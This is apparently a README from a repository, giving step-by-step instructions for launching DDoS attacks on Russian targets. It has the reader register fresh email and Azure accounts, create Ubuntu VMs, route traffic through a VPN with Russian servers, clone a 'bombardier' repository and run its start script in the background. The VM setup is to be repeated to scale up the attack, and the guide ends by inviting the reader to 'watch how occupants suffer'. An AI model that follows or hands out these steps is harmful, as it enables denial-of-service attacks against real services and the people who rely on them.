
### Prerequirements
 - Valid mobile phone number
 - Valid bank card
 - VPN with servers in nazi-russia
 - VPN configuration in OpenVPN format (*.ovpn) with certificate (*.crt), privet key (*.key) and login/password. _For example, in CyberGhost this could be generated on account page in menu VPN > Manage Devices > Configure device_
 - SSH client installed (For Windows use OpenSSH)

## Guide

1. Register new email
1. Register new [azure](https://portal.azure.com/) account
1. Login to [portal](https://portal.azure.com/) 
1. Press `+ Create a resource` button
1. Next `Ubuntu Server 20.04 LTS`
1. Create new `Resource group`, if there is no one, or choose existing
1. Enter `Virtual machine name`, for example vm1
1. Create azure ssh key as Authentication type and download private key, if there is no one, otherwise - choose existing
1. Leave default user name - `azureuser`
1. Press `Review and create`, then `Create` and `Go to resource`
1. Copy `Public IP address`
1. Copy zip archive with OpenVPN configuration (*.ovpn), certificate (*.crt) and privet key (*.key) to virtual machine - `scp -i <private key path> <path to OpenVPN files archive> azureuser@<VM public IP>:/home/azureuser`
1. Connect to machine using ssh - `ssh -i <private key path> azureuser@<VM public IP>`
1. Unzip previously copied archive so configuration (*.ovpn), certificate (*.crt) and privet key (*.key) files are stored in /home/azureuser/vpn directory - `sudo apt install unzip && unzip <OpenVPN files archive name> -d ./vpn/`
1. Create authentication file - `cd vpn && nano vpn.auth` in format:
```
UserName
Password
```
16. Clone this repo - `cd ../ && git clone https://github.com/almerico/bombardier`
In result you must have next folder structure
```
~/ _
    |_ vpn
        |_ *.ovpn
        |_ *.crt  
        |_ *.key
        |_ vpn.auth
    |_ bombardier
```
17. Go to azure folder - `cd ./bombardier/azure/`
1. Install dependencies and check everything is working - `./install.sh` (you must see `Installed and healty` after some time, ignore `Terminated` message) 
1. Close docker (CTR+C) and run it in background `./start.sh`
1. DDOS is started, you can exit - `exit`
1. Repeat from 4. and watch how occupants suffer
